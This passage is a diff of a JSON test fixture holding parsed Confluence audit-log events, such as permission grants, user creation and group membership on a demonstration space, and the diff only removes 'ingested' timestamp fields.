"2021-12-24T00:46:29.837593345Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.269Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13234,7 +13090,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837594338Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.267Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13330,7 +13185,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837595220Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.265Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13419,7 +13273,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837596092Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.262Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13515,7 +13368,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837597074Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.259Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13611,7 +13463,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837597947Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.257Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13707,7 +13558,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837598938Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.255Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13796,7 +13646,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837599856Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.253Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13892,7 +13741,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837600766Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.251Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13988,7 +13836,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837601696Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.249Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14077,7 +13924,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837602564Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.247Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14173,7 +14019,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837603454Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.245Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14269,7 +14114,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837604791Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.242Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14358,7 +14202,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837605707Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.240Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14454,7 +14297,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837606616Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.238Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14550,7 +14392,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837607592Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.235Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14639,7 +14480,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837608516Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.231Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14735,7 +14575,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837609566Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.219Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14831,7 +14670,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837610741Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.192Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14913,7 +14751,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:46:29.837611661Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.950Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"admin\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -15002,7 +14839,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:46:29.837612656Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.924Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"admin\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -15107,7 +14943,6 @@ }, "event": { "action": "audit.logging.summary.user.created", - "ingested": "2021-12-24T00:46:29.837614041Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.860Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[{\"key\":\"Active\",\"i18nKey\":\"Active\",\"to\":\"Yes\"},{\"key\":\"Display name\",\"i18nKey\":\"Display name\",\"to\":\"test user\"},{\"key\":\"Email\",\"i18nKey\":\"Email\",\"to\":\"test.user@example.com\"},{\"key\":\"Username\",\"i18nKey\":\"Username\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -15201,7 +15036,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837614920Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.253Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATESPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15286,7 +15120,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837615799Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.251Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATESPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15371,7 +15204,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837616671Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.250Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15456,7 +15288,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837617548Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.246Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission 